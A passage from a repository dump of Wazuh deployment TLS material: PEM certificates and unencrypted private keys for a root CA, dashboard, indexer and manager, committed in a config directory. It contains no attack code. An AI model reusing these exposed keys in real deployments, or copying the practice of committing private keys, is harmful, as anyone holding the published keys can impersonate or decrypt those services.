HPAFOJUXiRm2HihZK8w+Vvgd8lCU9L16Ew6KvqgEW+VsDwvQPF/KTpbmwo3Mt815 9 | MEYVCepiRuERAIDwj/l9zcbMiVD9QatDknuHxG0n5pHKuFixu25C5gSTZWl2ZfiQ 10 | LASlaEnhaS9hMlKuEJy1hbshedUy1ThVoTX8vjkyf4qCsN0SHdFm45HYMj9RvIfF 11 | FJ9mbZLeBRsjUWvimavQoqlxzh609zmk+rZc0H/twrC6huBNQ5Ocxt36+EMi18pN 12 | ctyp7BBkgvgKGJBUdINMyenfRi/gKotS1QIDAQABMA0GCSqGSIb3DQEBCwUAA4IB 13 | AQAdXzzKojUtcdmk+2dzp7HDiiZWrtHH7Ko5TjcX2hxobG8pqrSy2AfmN5v3PYUS 14 | s9W0MjySLB+rM6cMBn8rITHpdnZBVzFQba6AuNmdqWqE6kl26s9/RkqF1ZQE4f/M 15 | Y8IBlZ4Uj3oH1oQHIGG/V8zXwt0SCTKrdXzDcKlKR63Tpd8/hHVS7oPOde1r7wmm 16 | gsFM1XeDaLmgy2ocG4/s0MxNU00qo+jiA0yTCqFEDOaJyRbTkuwv6aEuFE2B8MvJ 17 | s307FPsRr/YCrnN3hC2V76sM4dtSgVdMtM8kMMz5iZW5aopZxRUAzUBQzwvauvLU 18 | ORni3fd+s/xWIFQAHg1QdUNy 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/root-ca.key: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC52o3YKB5IILxy 3 | 9mlt8v3J/DY2CvPYrLCPaP2VDJ+Dm5mqMCH+MZ3/+RGmzP+/8xzlmFD+ThXZ9oWC 4 | ptOYtccU/JALDuDh2FNsjQH+aDNHECKOfnf/C/okrO5rtOMRPG72vmId4yyNAPa5 5 | 0hgB+kHTu60rkqdKUYHW+w3tefvCRSKYHDkWxnOz2gqYeVhCJ+QGofo6lxtrefKV 6 | spbMtQ//Lp3chS8FbeTyEQFBkcm3Lh3sC3KVWFfxi3m33tNvziIwdRaehMySllII 7 | wmy6fFYUCZaeBNxPgs2GhkudqFatid0/shLuiD9gEDG0bjT2UpaRQKSGk8nuiap3 8 | QVuyh4ndAgMBAAECggEAfkw/SD07FtjoN1esncMbJD/4txEKVJxF/67hZICHhfAf 9 | pL/A2fTt4h1oGWoGAnM7l+rCX47A2rXkVLz53jTpbSGU4W7i85cGWiYYzMIS1p/o 10 | W90lvnRtMK8z9o2eIQBoh9Uo6BaRF+EnyW80UWO3iCNpssqeVKq/CVDiThcvNvyL 11 | A09NsQey1Al0VSsm2uv1kVZRADuBljKA1DBN/cLvTEtwiE7oXU/XF/OPRjibJ2GT 12 | R5ABF4y44OdxQ5YW0M+RX9GIJ6oTWYYudAxqBLl7KfENFr2o2rw5BKINFXGYih49 13 | WX8l9SRZdtaV5PQbJ2TU35RipBX1ywvjR6VlJFy/AQKBgQDruRc8tC7JgTsZ32+N 14 | 3SNMw0NJDJO+jW9+4BaoTXQ/2qh40gnQhFhdnxk49arRu4S6R427sZ12sjnv4bJP 15 | 8wfYr+SrqBkUtdzcCevMSCRWAPmXmJVJ3UVt+W+Yotisftdu9tYMhJTlmCBu8RWT 16 | 4wuO5l0jC8V5Zc6DywaKh8hI1QKBgQDJ10fXu6KKidSOmSCfRYB47a1QQEoT4QGg 17 | 39zxOKkUHQM+LGBTcYo2wlQ3ndlB1eFuExzdnJp1MhKqAkcIh3PSrgbgQ54CPuTq 18 | yQTmJ14d8fmPmaFsI2RNGype97EYniBWshgJ+d8Igbd+XNVi+Z4lwzUpsO1YBh+L 19 | 6Xpu4uhA6QKBgDw5hd5Uir+g7OCnXXD5VtN97+rx861zpVDdH+zQHStTSkfUIf3M 20 | UmdZBrCu033SUw7kySlzL6/ryTGokE4s4YxTJDFXOVE5RbxSLJR8ugvfI+W/biT5 21 | C4wVdpWgxYsMvS30kquQFBq0y1SM895c288evB0AHOvvPtwdOwaZumohAoGAWWNe 22 | DcyrT297Eyv9povBOc0I1GGkbOlZL0X1M19EggPXS9GbV1kRPO8THQ5rCR0PmRAd 23 | 2IdiYESsv14C12Qlh0hLA0bu00/HUbN01/jXVau0OkRvmNSTtxIw0Z4gcCaXa82z 24 | l7dxbvMDsJKsbgjeYRrykGQquLD9h5j+/9y9vwECgYEAg5Gr+yvmkMZPdAWO9ZEZ 25 | hYqUKU13JUpf7wyRczTKmFa9Y4TCP+ga2PPZduBblc+/380pVLMViDAtJcbULUYo 26 | Ya9tE3EYURoXDvD/98MHBEaR1rKp0ryswYfih9znAVy6GwARImO4j2GsHd0J7w7T 27 | cHfTey8XHF0srL6oy4Zl7lg= 28 | -----END PRIVATE KEY----- 29 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/root-ca.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDSzCCAjOgAwIBAgIUbCIQTorYl6G5+9uBL3flhk45Lx0wDQYJKoZIhvcNAQEL 3 | BQAwNTEOMAwGA1UECwwFV2F6dWgxDjAMBgNVBAoMBVdhenVoMRMwEQYDVQQHDApD 4 | YWxpZm9ybmlhMB4XDTIzMDQyNTE1NDU1OFoXDTMzMDQyMjE1NDU1OFowNTEOMAwG 5 | A1UECwwFV2F6dWgxDjAMBgNVBAoMBVdhenVoMRMwEQYDVQQHDApDYWxpZm9ybmlh 6 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAudqN2CgeSCC8cvZpbfL9 7 | yfw2Ngrz2Kywj2j9lQyfg5uZqjAh/jGd//kRpsz/v/Mc5ZhQ/k4V2faFgqbTmLXH 8 | FPyQCw7g4dhTbI0B/mgzRxAijn53/wv6JKzua7TjETxu9r5iHeMsjQD2udIYAfpB 9 | 07utK5KnSlGB1vsN7Xn7wkUimBw5FsZzs9oKmHlYQifkBqH6Opcba3nylbKWzLUP 10 | /y6d3IUvBW3k8hEBQZHJty4d7AtylVhX8Yt5t97Tb84iMHUWnoTMkpZSCMJsunxW 11 | FAmWngTcT4LNhoZLnahWrYndP7IS7og/YBAxtG409lKWkUCkhpPJ7omqd0FbsoeJ 12 | 3QIDAQABo1MwUTAdBgNVHQ4EFgQU9hWDt3jx2e0j4qqNBI1uu5thwegwHwYDVR0j 13 | BBgwFoAU9hWDt3jx2e0j4qqNBI1uu5thwegwDwYDVR0TAQH/BAUwAwEB/zANBgkq 14 | hkiG9w0BAQsFAAOCAQEAsFvVt3irLQN4f7DYYXpaZ0joakbU8dBmzcwXiaKp4cRe 15 | hxPbh3DKSv1WFKFoQDE1GgdoorYpHhSHD/7Ltbp3JerkJVZ+E0qImCBDG3f0Wcys 16 | e1hzno87d+KL3Hs+iRR9DevPo3mlvOG0gBEEq6msJ7vg72TSw7JSlSd/fqkDcUpb 17 | oSpFJ9TFDfzrwApZub49nmTDwctl8T7qNNXd9rvetu17nQKRwMTnM46261JQVdJX 18 | ckpwuQ5cRhlAyslGmPXuMImtxNZGGg9ZzKycTDFBtUEIQ4pZz1WbRO6J5PA/Umrf 19 | 6k7dCGpC4hMs8RkIjTadtVhAGh5xgviNTVO7D/lrsg== 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/wazuh.dashboard-key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDyNC6Am92wUmP0 3 | DxqIBjuxL81ZP2ONmFlNtwiK4ZjQutV+dEHLgUv2hlrDWIkpg4B6o3F6mREQgXRA 4 | yHaE00jpAnwOH0KFbk+0sCODLsecSbvjdImgZ6jZuXwyGEE99RQ35wvj9jEM/XQV 5 | OMzGjKeeTAqiqgIbQc/A+4mEZEBt11takGPx9VoKsPwGYFf8j6YNTpFxF+aghiA9 6 | eTUnFJX6zPfGhF4XfsGVQTA9/RrRMd7troq70XGm/ApIuhLS6wHOVudTojC6/+Rs 7 | ShhL/yFGPM1x/MAcYkrCWoV5ikYQeqbMDkhIzFa+VCeuoE0D8n6CkUJwOvpigB6x 8 | i23LBcoBAgMBAAECggEBAMRjc2FtAPC7nbiDlqu9AiHF9Ofs8jgZ1C+jvhV+n36A 9 | QCRs9/yfNo0KnAXRgEZdDoxigt05yBBuJ2lwIknJWFE3Zoe86R9wNsj4GZOBFvGv 10 | B96C3CVoaA1CzWWBLUWjt2UsvwN02IkD6mBa0hAcdL1yQx1qZJLdZivAydzDvUpR 11 | xTRsIw3y6QDfabcr0JlnYILLuVTGVuPD8IP9EgnpvU/vsShagbaR3Bxirna6eTwX 12 | KZhE2rT0PzIC2aqr/+S64fIkGUU1ptUEGWYurPB1OmyxsIhed/URsYnkH+s8wjdS 13 | jEH4kcf7WJitTe9IACr2eYuf5TJKnauSX5o+0La5+1ECgYEA/C4o3LCoBjxKBysN 14 | stqUPJJgoBMF8LzTCnnzKshcDcOs1ZyYw4LDEQtufkQhhL7RoK+nqRvfsRKvYGbh 15 | 8tAabszIBbmnd7omy9D0U7JdZzM6UJnHY+AzaXKNNwVtNOuHzLUytDLSLqpycVmZ 16 | IDaNBd7C3aD0o/wBP6dy77QV0TcCgYEA9d9Weh9M8m/N8P2E+qCQ3BsoO8kE+Wfb 17 | m7CI/5CD4/1UlKo9aeZwfFhES+qDslQLsrs2GPCX/hjY0JaHlX7rIm06bKCOO7Kn 18 | 9zN9S296Zwf8n6yuwkB92szusUDQXa8NT7qvoAfO82TOUG4qdfSn1YyKYvMAgPT6 19 | B2M1BFXSOocCgYAiOSl2ecrzva7WNjOPuDYx2jOexbYiq52AaHhlr/c+LvX/r1bU 20 | AaTzZTfDjv91gmf0hKIeQxgiccS3Mn8rcq6DpurmTAG8L9kgA+WEjko6vSsG0TfM 21 | CBsyDke31dayPdyaHWUaK2N2zc7mLyCmzIBq8YZEiZlpv8NzngftG+VyFQKBgQDQ 22 | zlgZpIVrisnh9Nu/ISeE1cdoZoJD8RDO+rCOIcPwlk8DZkR7sEktQKTXuBUaGEhL 23 | BLSfn4vlLmLLWltQ+ZVlClBIul2wkzwUMvUgYE8aOu0vCa7sp2p6q/m2LO4H8ccj 24 | Q88s4BTAHYcdRUHoJNt3/z/zYp215taD+Zunz96W9wKBgQDykI/GaI4QV7soUs89 25 | L5PL4zRkbfGn/GfLzySpwaO3InliQJaF/2T1LAivUHlodotjjhhrNORBErHHPFRq 26 | HPYV0lG41C84CPCUBbs+Xc1nv9MVt3xnF0hS8CJGTckwXr99dvNq9zyJ59PG8gmZ 27 | M/T3vg6NZOFDaYWEXiD/FWxdIQ== 28 | -----END PRIVATE KEY----- 29 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/wazuh.dashboard.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDdjCCAl6gAwIBAgIUBOvkerpX1HuYL2z1rGCjM6ZsEzUwDQYJKoZIhvcNAQEL 3 | BQAwNTEOMAwGA1UECwwFV2F6dWgxDjAMBgNVBAoMBVdhenVoMRMwEQYDVQQHDApD 4 | YWxpZm9ybmlhMB4XDTIzMDQyNTE1NDU1OFoXDTMzMDQyMjE1NDU1OFowXDELMAkG 5 | A1UEBhMCVVMxEzARBgNVBAcMCkNhbGlmb3JuaWExDjAMBgNVBAoMBVdhenVoMQ4w 6 | DAYDVQQLDAVXYXp1aDEYMBYGA1UEAwwPd2F6dWguZGFzaGJvYXJkMIIBIjANBgkq 7 | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8jQugJvdsFJj9A8aiAY7sS/NWT9jjZhZ 8 | TbcIiuGY0LrVfnRBy4FL9oZaw1iJKYOAeqNxepkREIF0QMh2hNNI6QJ8Dh9ChW5P 9 | tLAjgy7HnEm743SJoGeo2bl8MhhBPfUUN+cL4/YxDP10FTjMxoynnkwKoqoCG0HP 10 | wPuJhGRAbddbWpBj8fVaCrD8BmBX/I+mDU6RcRfmoIYgPXk1JxSV+sz3xoReF37B 11 | lUEwPf0a0THe7a6Ku9FxpvwKSLoS0usBzlbnU6Iwuv/kbEoYS/8hRjzNcfzAHGJK 12 | wlqFeYpGEHqmzA5ISMxWvlQnrqBNA/J+gpFCcDr6YoAesYttywXKAQIDAQABo1cw 13 | VTAfBgNVHSMEGDAWgBT2FYO3ePHZ7SPiqo0EjW67m2HB6DAJBgNVHRMEAjAAMAsG 14 | A1UdDwQEAwIE8DAaBgNVHREEEzARgg93YXp1aC5kYXNoYm9hcmQwDQYJKoZIhvcN 15 | AQELBQADggEBAGcI6iHbDa5X1eL2MIvBJXCiFXwSOD2Sw9Ij5dRn45FjqwNh14yv 16 | +XaJWhtemidKfGjyrSNCwDBD4m03Ew+pIlX+e1CIeOdSxh4i4xWExENewHpvMBfD 17 | Dr5Y65EQB8lTjhx5bgg+g1pmBs3yf5RLG1lSZ3a6fUzKP3WDXEUB0o5w1VvFeXi0 18 | tt6/boW+jtcp1Xb2SVMT0uY803+8SS8wy242eYgkqhULleZdJW0fIv/+qpcJTssW 19 | ZoW79LI+z8vYVfnwYdpqU8Ebp72s7ZuF6VwxTDvP0xZxQ8D8hXaQioeKOyXMmESK 20 | 0dshYBYtCqjxP7bZHmgB2OqV7H+2zscNKRo= 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/wazuh.indexer-key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC3veYAt9jTGcbE 3 | P/BLIpevFKkTWgiWtm6aN3+Miex7eXriQptolHP9GvJJfb+sn1TCOn9tcZpjDwXX 4 | /atjG0rZ4296wVxiU+uj7BOgkkXymr1AzP4xYJhTHgJti6EkBMI7PfIL/677Ly4M 5 | BjkeVm+I2rCkIeFRPeH500l6sokLvzEy2jUgf2uLjLU7bWo/9IJ3k4wDKYm+ChmX 6 | H7ZmnnzgszuJ4V1+CR3XI4bRwyiYXtENvxHKUoAiuQ81GJIvubIx6R8QK0F3//VY 7 | sWhq7DHpck6N2QUK28Tsj139lo9YRvzXL8en91lBSSBSu7m5j8gxtZK308wvNTKg 8 | +l/HL/PRAgMBAAECggEAdH5qqAPn7ZeHJP/gytJI11FDDSjlDyDlKNONA76id3qC 9 | xZczTu/oRg3ilWOrtbdjFq3eAranCq0IqHOFSRWRtGl1UZ/sgc7xNIHFw+VZgcJH 10 | wSD2/LlgejopkeiYJuz5dHQG1UKrX0f/atI7PpfQqTT2D2oHn+mbLziderRdHVts 11 | WvgcmNhcGfNhbu69izCUCDExTvonnTy05SzKzTEgI7MRHvDrNPsO4L1r2Ddckrga 12 | yP6dVwgo9O4QDr4NZsdbIztKKoCTwZzqlbe84C8fYXAEIdU5GTh1e8NVzt7xr/HH 13 | q+8A0MN5z66he2grWNgTz/irylhisF37wcboRAC63QKBgQDlAwHa+wzg2jurcDs9 14 | KApxfhjeEtXtwfGJy3IZWIh/trQp0FWNgEsmu+sxLqX9M8+Y18eDSxan43Zcxndx 15 | LUDvk3YFhdBMFXMr9q5oxjcoMcgvhDwfjn3krPQ9AbQ8BPgfQmAoo8ioGegMc4Ie 16 | 6Jd5VG5xJvY+4UFh3rq0W1nGBwKBgQDNZSd+gmZ3Yb/E91Owin3Z8FWyikJH2KfB 17 | 2vWq8TclXDOxPFcHhZYqV+L4BXysj1HKTvXMdIqKYe3PNKiue2DytXoobuDcw5bf 18 | BEl6XFhUD12Kl8Wgvl+SdP44c0aFI30mbpPEgH5AwX8Zg+tr/3vRpVNuHhOrv39V 19 | N8LxqIrBZwKBgQDfqzg8r8W8Nmjg4BR7fof0oLuY6byXIjzN4C3oI1ftpHwB+sAU 20 | G6FKi28B8hWcXuX62YS67rOJ9da8dfpiR1iMpPE4I6F1Ld32qk9ddXqZf0WNYxF1 21 | oK3EkkdY7jkiBZhwr1tLVeu8gtDomEgV+AU5MwVK7krCzy4UcHzZef8MMQKBgFZT 22 | sqLIefqpOem2LhWgT77+9XXiCHOcCv4+Ykzjr1LjitJuUwHVUsUfRUULQVhhsHXA 23 | dCznuqbo/AO/1Tnon1nDjsFZwOboyguYCK4GDBXgk2dB3Q1vlkm/JG5jfPtObDZv 24 | +Wl4vBfJe/skaBlvOwJlY0iAGbJw/Tq7AhOBzDf3AoGBAIWVTHV3y/pnCjY4WB6N 25 | mOED+/iVNYZ9hNk8raETQZyO+4jw+Ezqq12tL2q9sOPp4kKLaH+rMYbwpTbXyDoQ 26 | 62tLFSaRvO5n4Bq1nexgHitoHyXhX6J8ogzRXXBSZR9RtbBSftBoCXVQDSSXAyo8 27 | r28j3g7v8jEzXG8EfoUfAzkA 28 | -----END PRIVATE KEY----- 29 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/wazuh.indexer.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDcjCCAlqgAwIBAgIUBOvkerpX1HuYL2z1rGCjM6ZsEzMwDQYJKoZIhvcNAQEL 3 | BQAwNTEOMAwGA1UECwwFV2F6dWgxDjAMBgNVBAoMBVdhenVoMRMwEQYDVQQHDApD 4 | YWxpZm9ybmlhMB4XDTIzMDQyNTE1NDU1OFoXDTMzMDQyMjE1NDU1OFowWjELMAkG 5 | A1UEBhMCVVMxEzARBgNVBAcMCkNhbGlmb3JuaWExDjAMBgNVBAoMBVdhenVoMQ4w 6 | DAYDVQQLDAVXYXp1aDEWMBQGA1UEAwwNd2F6dWguaW5kZXhlcjCCASIwDQYJKoZI 7 | hvcNAQEBBQADggEPADCCAQoCggEBALe95gC32NMZxsQ/8Esil68UqRNaCJa2bpo3 8 | f4yJ7Ht5euJCm2iUc/0a8kl9v6yfVMI6f21xmmMPBdf9q2MbStnjb3rBXGJT66Ps 9 | E6CSRfKavUDM/jFgmFMeAm2LoSQEwjs98gv/rvsvLgwGOR5Wb4jasKQh4VE94fnT 10 | SXqyiQu/MTLaNSB/a4uMtTttaj/0gneTjAMpib4KGZcftmaefOCzO4nhXX4JHdcj 11 | htHDKJhe0Q2/EcpSgCK5DzUYki+5sjHpHxArQXf/9VixaGrsMelyTo3ZBQrbxOyP 12 | Xf2Wj1hG/Ncvx6f3WUFJIFK7ubmPyDG1krfTzC81MqD6X8cv89ECAwEAAaNVMFMw 13 | HwYDVR0jBBgwFoAU9hWDt3jx2e0j4qqNBI1uu5thwegwCQYDVR0TBAIwADALBgNV 14 | HQ8EBAMCBPAwGAYDVR0RBBEwD4INd2F6dWguaW5kZXhlcjANBgkqhkiG9w0BAQsF 15 | AAOCAQEApoVdHCuT17FPaRHbtJ/TtcEGCkfvBSDzpIgaEIc9Q1DpVlh+w2V9GJJc 16 | ZzL9GrxpH6qWfdpjpAbGpQv9Pw11T/t0pPnfC35YoninuzgySVh0vfuh0vCGkIzk 17 | ct2tlmyx7uArUaEb7qK7KrFoY/xj6PbUf0NDldN6w+Un/NNO4PUrVPX9AAEYIZJr 18 | W7nPQXDcxvUuEQWGc3V76VVSjECW11ATLEDgXm3UP7rvuD4r1eAqRzawJDt+/T7d 19 | 4eKZwY413yKcrScIwP2S71Nxk+b4lRvIwdgrhzUaLRQtrzIEhd0g2GZy5jGgeZ2h 20 | 6nQwhbZ+8lD9G8Q0NxF189BXABwoTg== 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/wazuh.manager-key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDosa7m9YeDD7Kz 3 | OXWnOp2nZ9pkY2x9tP3EpxR9Xk1Hfvn7xOP4AUM/AixK86URkOj21KS8uk7xgWDv 4 | P0yMOInQt/6k2lauTtkdSnQwzZ0CgBfhRKpdT5ifBWb+fJ8UJz9nS9VsnUGJY61B 5 | 2S/ymGyWVb1RfP5p8hl6oRrN6mK1euf1TVDf/OcUbDC8xFAJaBgsoCu+yZIxoHFv 6 | ap4qtbgfBDukG0Zp5AWiERr6YU3KxxQEnhJ7D1+NGyg70r1+PwJ463wVumsa91Hm 7 | cpP0OUI3Jy21c2+rtE+/IUaLUkB4TlbLNlPp1AK8yIxTvjG0MmntIiJZ7GHoy6bl 8 | jO3H3eTpAgMBAAECggEAKBbstjfY9/iNZhlhLsWHgd7/nkoO1/2Ftwq+GfdUQxwa 9 | P4klaYX2KvXZ4bPmXYdky5nJJAbJMQyEQdPbAVGAVOhOQ+KmCnPlLgm0yO+zvEmL 10 | U7E71MWw2rzYiMG5uoQkhUxoYcUaFGyK3gxoGVivZJsy+cYaIvCl+R2me5GFHhTR 11 | nGklg4GqBGtQuP1Fo4gInlQZh0gZxjw8nAho578eNvEhy+Drcjr1vptiLzA5pTgm 12 | 5SNlIuaSM/8EEdG7yNhPIw9jtn4sB/aXXLN6dePGW7vjMRtPrbPGgo7CEYPLMy3U 13 | C92reJ7UlQLpDuhXa3/8gSAPBrikvJvhb9E9pB/CgQKBgQD7j3jgXvdKpbCJoU39 14 | R0CCJn58Bu4Tun3QP9lz5vzbSlRRQN31rJkkAE0ZZQDoxca1HSVcuJ2rFQVxPf4u 15 | Ya/I8/n75ZuRbFyp/SSIKeLSbDiWb7VlpS3lx+NVVZ4oBVbfgnN+QGHy/O3V3CD8 16 | SHvng8oQx6fIAmQyTWxX5shzUQKBgQDszPl3UFECZAvpZWBFXPkI/XoXZJDDRSQm 17 | +P4tjG8EjWsWJWq4zgQTC8gGJoTyd0FCDsHS7tJbdwlygBc59iwNwI+sFd4s3a6C 18 | j/onDryMx6OLksYGX/WerDvdYzBCSAA2bIXQavmM4ohiw09XqRROpYzwP0UW73ti 19 | SAf5liQCGQKBgGhOVwqBlfwHs6l9jr7kWmUc3PlETlczzpMYxmt+bX3n1gpS4TXK 20 | uTzqOw26iaP6zaevTBykGAwmDTmlQM2uh5rFPvQpglXMHqgFZK5o37nsUZJfA1IA 21 | KYXLWgG6HHfvrtPCXW0N+Q8tvNgeDDdPPsECLjjC8FjIVQ9edvwDnz3hAoGALFhi 22 | a16mHQ2BUY8DjVnQ5UcawyC5H2hmUcoVR5BiBfc506bkKoGiL7LoHYa/JO0CUo2S 23 | 7J5+1FQhd8jXEKqyK00hWrepqLtG//pYfVH8K10DmpK89Nqpk7Jrb5Uwp2j2aTq/ 24 | gH1YCHMv2Vb8F815GRVVpHQkyxvD/m7A15OvYJkCgYEA625qT0jJOQ9/YTXFKnrk 25 | +VhJlnOtll4y5TBCikH33JOxzEoza+aQPq3xiTC7ZewkbWTbcXI0jJeNLK/QY5vq 26 | GMMIKMbePs5JuAehNczSwt4loHqnyo2mtNjito/599gV1DqFD2L4JLuCTi9tBAv1 27 | gI4hKB0vOIow9bq1IAjUtbI= 28 | -----END PRIVATE KEY----- 29 | -------------------------------------------------------------------------------- /wazuh/config/wazuh_indexer_ssl_certs/wazuh.manager.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDcjCCAlqgAwIBAgIUBOvkerpX1HuYL2z1rGCjM6ZsEzQwDQYJKoZIhvcNAQEL 3 | BQAwNTEOMAwGA1UECwwFV2F6dWgxDjAMBgNVBAoMBVdhenVoMRMwEQYDVQQHDApD 4 | YWxpZm9ybmlhMB4XDTIzMDQyNTE1NDU1OFoXDTMzMDQyMjE1NDU1OFowWjELMAkG 5 | A1UEBhMCVVMxEzARBgNVBAcMCkNhbGlmb3JuaWExDjAMBgNVBAoMBVdhenVoMQ4w 6 | DAYDVQQLDAVXYXp1aDEWMBQGA1UEAwwNd2F6dWgubWFuYWdlcjCCASIwDQYJKoZI 7 | hvcNAQEBBQADggEPADCCAQoCggEBAOixrub1h4MPsrM5dac6nadn2mRjbH20/cSn 8 | FH1eTUd++fvE4/gBQz8CLErzpRGQ6PbUpLy6TvGBYO8/TIw4idC3/qTaVq5O2R1K 9 | dDDNnQKAF+FEql1PmJ8FZv58nxQnP2dL1WydQYljrUHZL/KYbJZVvVF8/mnyGXqh 10 | Gs3qYrV65/VNUN/85xRsMLzEUAloGCygK77JkjGgcW9qniq1uB8EO6QbRmnkBaIR 11 | GvphTcrHFASeEnsPX40bKDvSvX4/AnjrfBW6axr3UeZyk/Q5QjcnLbVzb6u0T78h 12 | RotSQHhOVss2U+nUArzIjFO+MbQyae0iIlnsYejLpuWM7cfd5OkCAwEAAaNVMFMw 13 | HwYDVR0jBBgwFoAU9hWDt3jx2e0j4qqNBI1uu5thwegwCQYDVR0TBAIwADALBgNV 14 | HQ8EBAMCBPAwGAYDVR0RBBEwD4INd2F6dWgubWFuYWdlcjANBgkqhkiG9w0BAQsF 15 | AAOCAQEAtrVa/Sa7Aq5QAnUIJ4qxCXifWckBkPZBN2zd/wrBbeOOGW6doxvcJLQV 16 | OUACYrR7H8e4TWAjCzgJe0LOJFCWlhd0uCz2g44+G9M4d1BJHcQJ98xML65dlk1Z 17 | Up4yHG4J+VrOsC7EKS8ePHVPqmAaetAXX+SvNprJs+5ZptfEIk2iqygnMw0962im 18 | 0t9NKWBY+Tt+wiiNBRBQlMkcm/jnk1pZrf5pMr1WBE+QOFsTi+3wQepT9L9yCGyI 19 | TJNtr0ti2FdkQ7JSOYuoPTmqnkz2C3f5iFWJj83vFYYjsWTLeMxBQgl88KH3A/EW 20 | KuUpSi0/vqZDi/mlngMA5lPvGPc1yg== 21 | -----END CERTIFICATE----- 22 | --------------------------------------------------------------------------------